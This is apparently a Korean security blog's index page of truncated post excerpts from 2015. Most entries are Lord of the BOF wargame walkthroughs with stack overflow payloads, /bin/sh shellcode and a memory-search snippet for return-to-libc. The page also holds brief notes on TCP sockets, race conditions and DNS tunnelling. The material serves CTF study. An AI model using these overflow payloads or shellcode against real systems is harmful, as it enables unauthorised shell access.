전체 글289

• echo TCP_server /*TCP_server*/#include #include #include #include #include #include #define BUFSIZE 1024void error_handling(char *message); int main(int argc, char **argv){ int serv_sock;int clnt_sock;char message[BUFSIZE];int str_len; case 1: struct sockaddr_in serv_addr;struct sockaddr_in clnt_addr;int clnt_addr_size; if(argc!=2){printf("Usage : %s \n",argv[0]);exit(1);} serv_sock=socket(PF_INET,SOCK_STREAM,0.. Security Study/Network 2015. 9. 18.

• 

  race condition(경쟁 조건)attack 경쟁 조건이란? 두 프로세스간에 리소스(resource)를 사용하기 위해서 다투는 과정으로, 본래 해킹기법을 칭하는 것이 아니다. 알려진 코드를 통해 경쟁 조건의 원래 의미를 알아보자. 여기서 fork()라는 함수는 동일한 작업을 하는 프로세스를 하나 더 띄우는 함수로써 fork()를 호출할 때, 결과 값은 새로 만들어진 프로세스의 번호가 된다. 이로 프로세스를 구분한다. if(a%2 ==0) => printf("O")가 /*부모 프로세스*/에서 50번을 출력하고if(a%2 ==1) => printf("X")가 /*자식 프로세스*/에서 50번을 출력한다고 한다. 그럼 기본적으로 OXOXOXOXOXOXOX이러한 식으로 출력을 할 것이라고 생각하는데 이와다르게 XXOXXOOOOOOOXXOXOOOOO 이러한식.. Security Study/System 2015. 9. 17.

• 

  LOB orge 코드를 열어보면 argv[0]=file이름이다. 그러므로 파일이름을 77byte를 맞춰주기 위해 심볼릭 링크를 걸어준다. ./까지 포함하므로 75를 한다.나머지는 동일 ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(심볼릭 링크) $(python -c 'print "\x90"*40+"AAAA"+"\x9c\xfb\xff\xbf(주소값)"') $(python -c 'print "\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\.. Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB darklf 소스를 열어보면 일단 전문제랑 비슷한데 길이를 체크한다.첫번째인자 값의 길이를 확인하여 48글자보다 크면 나와버리는 것을 확인 할수 있다. 일단 앞과 똑같이 진행하고 payload를 작성때 ./darkelf $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"') Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB wolfman 다시 문제를 풀면 두둥 전 문제랑 똑같은 패턴이다. ./wolfman $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xec\xfb\xff\xbf"(주소값)+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"') Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB orc cp명령어 같은 건 무시하고 다시 접속을 하여 문제를 풀면 orc.c를 열어보면 buffer가 40이고 리턴값이 \xbf가 꼭 들어가야 한다고 나온다. gdb를 명령어를 이용하여 메인에 브레이크포인트를 걸고 r $(python -c 'print "\x90"*100을 입력하여 esp값을 바꾸었다.그후 x/100 $esp로 값을 확인하면 90909090들어가 있는 주소를 볼수 있다. payload를 작성해보면 ./orc $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xdb\xfb\xff\xbf(ret 주소값)"+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68.. Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB goblin 접속을 하고 (cp 같은 것은 무시하겠습니다) 소스를 확인 하면 이번에 또한 buffer가 16인것을 확인 할 수있다.먼저 vi 를 이용하여 프로그래밍 GOGO!! 위와같이 #include #include int main(int argc, char *argv[]){long shell;shell = system 주소값;나머지는 동일 하게 프로그래밍을 하고 gcc를 이용해 컴파일을 한다. 이제 system 주소값을 보기위해 gdb를 이용해 들어간후 b main명령어를 이용하여 메인에 브레이크 포인트를 건다.그후 p system이라는 명령어를 이용하여 system 주소값을 확인한다.(프로그래밍할때 입력해야함) 이제 payload를 짜보면 (python -c 'print "\x90"*20+"AAAAA(ebp+8.. Wargame/CTF(Capture The Flag) 2015. 9. 15.

• system /bin/sh 주소 찾기 #include #include int main(int argc,char *argv[]) {long shell;shell = 시스템 주소;while(memcmp((void*)shell,("/bin/sh"),8)) shell++;printf("%p\n",shell);} Security Study/System 2015. 9. 15.

• network base 64 = 64진수미리 base 64 색인표를 구성해져있으며 6bit씩 나눠 포함한다.base 64 는 대소문자가 구별되어있다.도메인 네임은 여러개의 도메인 라벨로 구성되어있다. 터널 패킷정상 패킷ethernet+ip+don't care 터널 패킷ethernet+ip+udp(53)+dns+encoded payload Security Study/Network 2015. 9. 14.

• 

  LOB gremlin gate와 마찬가지로 cp명령어를 실행하여 파일을 복사한다. 그후 gremlin.c를 열어 보면 16이라는 buffer로 small buffer라는 것을 알수 있다.그후 gdb를 이용하여 보면 sub 0x10의 값을 확인해보면 16이라는 것으로 dummy 값이 없는 것을 확인 할수 있다. 16바이트를 확보하는 것으로 보이므로 main+3에 브레이크 포인트를 건다. 그리고 프로그램 실행 동시에 인자가 전달되므로 argv[2]의 위치를 알아보기위해 $(python -c 'print "\x90(buffer+sfp값)"*20+"BBBB(ret을 덮어써야할 주소 가들어갈 위치"') $(python -c 'print "A"*241"")을 넣는다 0x42424242가 ret위치로 덮어써야하므로 대충 414141414.. Wargame/CTF(Capture The Flag) 2015. 9. 14.

• 

  LOB gate LOB gate로 접속을 하면 gate와 gate로 접속가능하다. 접속후 확인 하면 파일이 3개있는 것이 확인가능 하다 먼저 cp 명령을 이용하여 gremlin의 권한이 없어 gdb 도 못하는 문제를 해결하자 !cp명령어는 파일을 복사하는 명령어이다. 파일을 복사하고 gremlin.c 를 열어보면 strcpy에서 문제가 발생하는 것을 볼수 있다.페이로드를 생각 해보면 일단 buffer 260(256+sfp)+shellcode+ret주소(buffer주소)를 넣어야한다. gdb로 확인을 해보면 strcpy다음에서 일어나니 b *main+59에 브레이크 포인트를 걸고 r $(python -c 'print "\x90"*200(임의의 값)')을 넣고 x/100x $esp 로 esp값을 확인 하면 0x9090909.. Wargame/CTF(Capture The Flag) 2015. 9. 14.

• system 2 gdb안에서의 blocking 함수 입력 r Security Study/System 2015. 9. 13.